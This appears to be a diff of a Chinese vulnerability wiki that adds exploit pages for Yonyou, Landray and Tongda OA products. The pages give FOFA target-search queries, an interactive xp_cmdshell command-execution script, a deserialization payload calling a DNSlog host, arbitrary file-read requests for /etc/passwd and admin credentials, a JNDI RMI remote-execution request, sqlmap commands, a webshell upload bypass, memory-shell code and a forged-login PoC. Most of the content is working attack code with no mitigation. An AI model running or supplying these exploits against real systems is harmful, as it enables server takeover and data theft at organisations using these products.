data = """cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>"""
try:
print("\033[32m[o] 正在执行SQL语句:exec xp_cmdshell 'whoami'...\033[0m")
response = requests.post(url=sql_cmd_url, headers=headers, data=data, timeout=10)
if 'exec xp_cmdshell' in response.text:
print("\033[31m[x] 数据库未开启 xp_cmdshell 模块\033[0m")
sqlcmd_open = str(input("\033[35m是否开启 xp_cmdshell\n(Y/N) >>> \033[0m"))
if sqlcmd_open == 'Y' or sqlcmd_open == 'y':
xp_cmdshell_open(target_url, db_name)
else:
print("\033[31m[x] 停止开启 xp_cmdshell \033[0m")
sys.exit(0)
else:
whoami = re.findall(r'output="(.*?)"', response.text)[0]
print("\033[32m[o] 成功执行SQL语句:exec xp_cmdshell 'whoami'...\n>>> {}\033[0m".format(whoami))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
def POC_3(target_url, cmd):
vuln_url = target_url + "/Proxy"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell "{}"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'.format(cmd)
try:
print("\033[32m[o] 正在执行SQL语句:exec xp_cmdshell '{}'...\033[0m".format(cmd))
response = requests.post(url=vuln_url, headers=headers, data=data, timeout=10)
data = re.findall(r'output="(.*?)"', response.text)
for i in data:
print("\033[32m >>> {}\033[0m".format(i))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
db_name = POC_1(target_url)
POC_2(target_url, db_name)
while True:
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
sys.exit(0)
else:
POC_3(target_url, cmd)
```
![yongyou-7-5](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-7-5.png)

28
OA产品漏洞/用友 NC NCFindWeb 任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,28 @@
# 用友 NC NCFindWeb 任意文件读取漏洞
## 漏洞描述
用友NC存在任意文件读取漏洞攻击者通过漏洞可读取服务器敏感文件
## 漏洞影响
```
用友NC
```
## FOFA
```
icon_hash="1085941792"
```
## 漏洞复现
登陆页面
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351304159-f00b4a4f-a104-40f4-a8bf-1ea00cf72c98.png)
验证POC **/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml**
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1628351371286-e2898425-5e54-438a-b5eb-4f20eed3636b.png)

36
OA产品漏洞/用友 NC XbrlPersistenceServlet反序列化.md Normal file
View File

@ -0,0 +1,36 @@
# 用友 NC XbrlPersistenceServlet反序列化
## 漏洞描述
用友 NC XbrlPersistenceServlet反序列化漏洞
## 漏洞影响
```
用友NC
```
## 漏洞复现
```python
攻击队利用用友nc反序列利用
目前测试影响版本nc6.5
漏洞url为
/service/~xbrl/XbrlPersistenceServlet
poc
import requests
import threadpool
import urllib3
import sys
import base64
ip = ""
dnslog = "\x79\x37\x64\x70\" #dnslog把字符串转16进制替换该段测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)
```

31
OA产品漏洞/用友 NC bsh.servlet.BshServlet 远程命令执行漏洞.md Normal file
View File

@ -0,0 +1,31 @@
# 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
## 漏洞描述
用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞通过BeanShell 执行远程命令获取服务器权限
## 漏洞影响
```
用友 NC
```
## FOFA
```
icon_hash="1085941792"
```
## 漏洞复现
访问页面如下
![yongyou-4-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-1.png)
漏洞Url为
```plain
/servlet/~ic/bsh.servlet.BshServlet
```
![yongyou-4-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-4-2.png)

84
OA产品漏洞/用友 NC 反序列化RCE漏洞.md Normal file
View File

@ -0,0 +1,84 @@
# 用友 NC 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友 NC
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w

53
OA产品漏洞/用友 NCCloud FS文件管理SQL注入.md Normal file
View File

@ -0,0 +1,53 @@
# 用友 NCCloud FS文件管理SQL注入
## 漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤存在SQL注入
## 漏洞影响
```
用友 NCCloud
```
## FOFA
```
"NCCloud"
```
## 漏洞描述
登录页面如下
![yongyou-6-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-6-1.png)
在应用中存在文件服务器管理登录页面
```plain
http://xxx.xxx.xxx.xxx/fs/
```
![yongyou6-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou6-2.png)
登录请求包如下
```plain
GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server
Connection: close
```
使用Sqlmap对**username参数** 进行SQL注入
```plain
sqlmap -r sql.txt -p username
```
![yongyou-6-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-6-3.png)

79
OA产品漏洞/用友 U8 OA test.jsp SQL注入漏洞.md Normal file
View File

@ -0,0 +1,79 @@
# 用友 U8 OA test.jsp SQL注入漏洞
## 漏洞描述
用友 U8 OA test.jsp文件存在 SQL注入漏洞由于与致远OA使用相同的文件于是存在了同样的漏洞
## 漏洞影响
```
用友 U8 OA
```
## FOFA
```
"用友U8-OA"
```
## 漏洞复现
可参考 文章
[致远OA A6 test.jsp SQL注入漏洞](http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/致远OA/致远OA A6 test.jsp SQL注入漏洞.html)
登录页面如下
![yongyou-1-1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-1.png)
POC
```plain
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
```
![yongyou-1-2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-2.png)
利用方法与致远OA 的SQL注入类似
## 漏洞POC
```python
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mFile >>> ip.txt \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞 \n[o] 响应地址: {} \033[0m".format(target_url, vuln_url))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![yongyou-1-3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/yongyou-1-3.png)

77
OA产品漏洞/蓝凌OA admin.do JNDI远程命令执行.md Normal file
View File

@ -0,0 +1,77 @@
# 蓝凌OA admin.do JNDI远程命令执行
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限
## 漏洞影响
- 蓝凌OA
## FOFA
- app="Landray-OA系统"
## 漏洞复现
利用 **蓝凌OA custom.jsp 任意文件读取漏洞** 读取配置文件
```plain
/WEB-INF/KmssConfig/admin.properties
```
发送请求包
```plain
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090125006.png)
获取password后使用 DES方法 解密,默认密钥为 **kmssAdminKey**
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090125061.png)
访问后台地址使用解密的密码登录
```plain
http://xxx.xxx.xxx.xxx/admin.do
```
![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090126340.png)
使用工具执行命令
https://github.com/welk1n/JNDI-Injection-Exploit
```plain
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
```
运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)
```plain
POST /admin.do HTTP/1.1
Host:
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg
```
![4](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090126051.png)

103
OA产品漏洞/蓝凌OA custom.jsp 任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,103 @@
# 蓝凌OA custom.jsp 任意文件读取漏洞
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
## 漏洞影响
```
蓝凌OA
```
## FOFA
```
app="Landray-OA系统"
```
## 漏洞复现
出现漏洞的文件为 custom.jsp
```jsp
<%@page import="com.landray.kmss.util.ResourceUtil"%>
<%@page import="net.sf.json.JSONArray"%>
<%@page import="net.sf.json.JSONObject"%>
<%@ page language="java" pageEncoding="UTF-8"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%
JSONObject vara =
JSONObject.fromObject(request.getParameter("var"));
JSONObject body = JSONObject.fromObject(vara.get("body"));
%>
<c:import url='<%=body.getString("file") %>'>
<c:param name="var" value="${ param['var'] }"></c:param>
</c:import>
```
请求包为
```plain
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"file:///etc/passwd"}}
```
![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090128987.png)
## 漏洞POC
```python
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import base64
import requests
import random
import re
import json
import sys
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: 蓝凌OA 任意文件读取 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'var={"body":{"file":"file:///etc/passwd"}}'
try:
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
print("\033[36m[o] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url))
if "root:" in response.text and response.status_code == 200:
print("\033[36m[o] 成功读取 /etc/passwd \n[o] 响应为:{} \033[0m".format(response.text))
except Exception as e:
print("\033[31m[x] 请求失败:{} \033[0m".format(e))
sys.exit(0)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090129010.png)

59
OA产品漏洞/蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363.md Normal file
View File

@ -0,0 +1,59 @@
# 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363
## 漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
## 漏洞影响
```
蓝凌OA
```
## FOFA
```
app="Landray-OA系统"
```
## 漏洞复现
存在SQL注入的 Url为,这里拿官方的演示站点演示漏洞过程
```plain
https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
```
其中存在SQL注入的参数为 **ordeby** 数据包如下
```sql
GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UM_distinctid=1785f7392888e1-02ece8c7e9a996-5771031-1fa400-1785f73928943d; landray_danyuan=null; landray_guanjianci=null; landray_sorce=baidupinzhuanwy; landray_jihua=null; JSESSIONID=232B6933CF33B5422F9D2649739D48FE; Hm_lvt_223eecc93377a093d4111a2d7ea28f51=1616509114,1616566341,1616566350; Hm_lpvt_223eecc93377a093d4111a2d7ea28f51=1616566350; Hm_lvt_d14cb406f01f8101884d7cf81981d8bb=1616509114,1616566341,1616566350; Hm_lpvt_d14cb406f01f8101884d7cf81981d8bb=1616566507; Hm_lvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616566507; Hm_lvt_22f1fea4412727d23e6a998a4b46f2ab=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_22f1fea4412727d23e6a998a4b46f2ab=1616566507; fd_name=%E5%95%8A%E7%9A%84%E5%93%88; fd_id=1785f817dd0f5a4beaa482646cb9a2d8; nc_phone=15572002383; j_lang=zh-CN; LtpaToken=AAECAzYwNUFEOEZBNjA1QjgxQkFsdW9stJ5e1pcW1hgQi3cOa0iEyAhdZZs=; Hm_lvt_95cec2a2f107db33ad817ed8e4a3073b=1616510026,1616566523; Hm_lpvt_95cec2a2f107db33ad817ed8e4a3073b=1616566523; add_customer=0
```
保存为文件,使用 Sqlmap 跑一下注入
```plain
sqlmap -r sql.txt -p orderby --dbs
```
![7028e5e6-5d0f-44f9-a3e0-044636024b0c](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090127479.png)
## 感谢名单
感谢 @Miaòa 师傅的投稿

49
OA产品漏洞/通达OA v11.2 upload.php 后台任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,49 @@
# 通达OA v11.2 upload.php 后台任意文件上传漏洞
## 漏洞描述
通达OA v11.2后台存在文件上传漏洞,允许通过绕过黑名单的方法来上传恶意文件,导致服务器被攻击
## 影响版本
```
通达OA v11.2
```
## 环境搭建
[通达OA v11.2下载链接](https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe)
下载后按步骤安装即可
## 漏洞复现
该漏洞存在于后台,需要通过登录后才能进行使用
登录后点击 **菜单 -> 系统管理 -> 附件管理**
![image-20220209105402262](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054355.png)
点击添加附录存储管理添加如下(存储目录为 webroot 目录,默认为 **D:/MYOA/webroot/**)
![image-20220209105417083](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054194.png)
点击 **组织 -> 系统管理员 -> 上传附件**
![image-20220209105436655](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091054718.png)
抓包使用 windows 的绕过方法 **shell.php -> shell.php.**
![image-20220209105510484](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055562.png)
2012 为目录
1717872192 为拼接的文件名
最后的shell名字为 1717872192.shell.php
![image-20220209105530593](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055671.png)
访问木马文件
![image-20220209105545405](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091055475.png)

174
OA产品漏洞/通达OA v11.5 login_code.php 任意用户登录.md Normal file
View File

@ -0,0 +1,174 @@
# 通达OA v11.5 login_code.php 任意用户登录
## 漏洞描述
通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。
该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。
## 影响版本
```
通达OA 2017版
通达OA版本 V11.X < V11.5
```
## 环境搭建
漏洞环境下载
```plain
https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe
```
双击安装即可
![image-20220209105714403](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091057824.png)
## 漏洞复现
使用[POC](https://github.com/NS-Sp4ce/TongDaOA-Fake-User/blob/master/POC.py)获取管理员的Cookie
```plain
root@kali:~/桌面# python3 1.py -v 11 -u http://xx.xxx.xxx.xxx
[+]Get Available COOKIE:PHPSESSID=sr3f46qg6539khd3e3rrucoa72; path=/
```
成功获得Cookie,添加Cookie访问 [**http://xxx.xxx.xxx.xxx/general/index.php?isIE=0&modify_pwd=0**](http://xxx.xxx.xxx.xxx/general/index.php?isIE=0&modify_pwd=0)即可
![image-20220209105731535](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091057599.png)
## 漏洞POC
```python
'''
@Author : Sp4ce
@Date : 2020-03-17 23:42:16
LastEditors : Sp4ce
LastEditTime : 2020-08-27 10:21:44
@Description : Challenge Everything.
'''
import requests
from random import choice
import argparse
import json
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
